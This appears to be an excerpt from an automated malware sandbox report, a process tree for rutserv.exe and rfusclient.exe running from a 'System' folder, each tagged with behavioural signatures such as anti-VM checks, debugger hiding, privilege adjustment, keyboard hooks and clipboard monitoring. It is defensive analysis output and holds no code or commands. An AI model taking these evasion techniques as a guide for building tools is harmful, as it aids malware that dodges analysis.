- C:\Program Files (x86)\System\rutserv.exe
  Command line: "C:\Program Files (x86)\System\rutserv.exe"
  PID: 552
  Signatures: Identifies VirtualBox via ACPI registry values (likely anti-VM); Checks BIOS information in registry; Executes dropped EXE; Suspicious use of NtSetInformationThreadHideFromDebugger; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
  - C:\Program Files (x86)\System\rfusclient.exe
    Command line: "C:\Program Files (x86)\System\rfusclient.exe" /tray
    PID: 2460
    Signatures: Identifies VirtualBox via ACPI registry values (likely anti-VM); Checks BIOS information in registry; Executes dropped EXE; Identifies Wine through registry keys; Suspicious use of NtSetInformationThreadHideFromDebugger; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses
  - C:\Program Files (x86)\System\rfusclient.exe
    Command line: "C:\Program Files (x86)\System\rfusclient.exe"
    PID: 768
    Signatures: Identifies VirtualBox via ACPI registry values (likely anti-VM); Checks BIOS information in registry; Executes dropped EXE; Suspicious use of NtSetInformationThreadHideFromDebugger; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses
    - C:\Program Files (x86)\System\rfusclient.exe
      Command line: "C:\Program Files (x86)\System\rfusclient.exe" /tray
      PID: 4956
      Signatures: Identifies VirtualBox via ACPI registry values (likely anti-VM); Checks BIOS information in registry; Executes dropped EXE; Identifies Wine through registry keys; Suspicious use of NtSetInformationThreadHideFromDebugger; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: SetClipboardViewer
Network
MITRE ATT&CK Enterprise v16
Downloads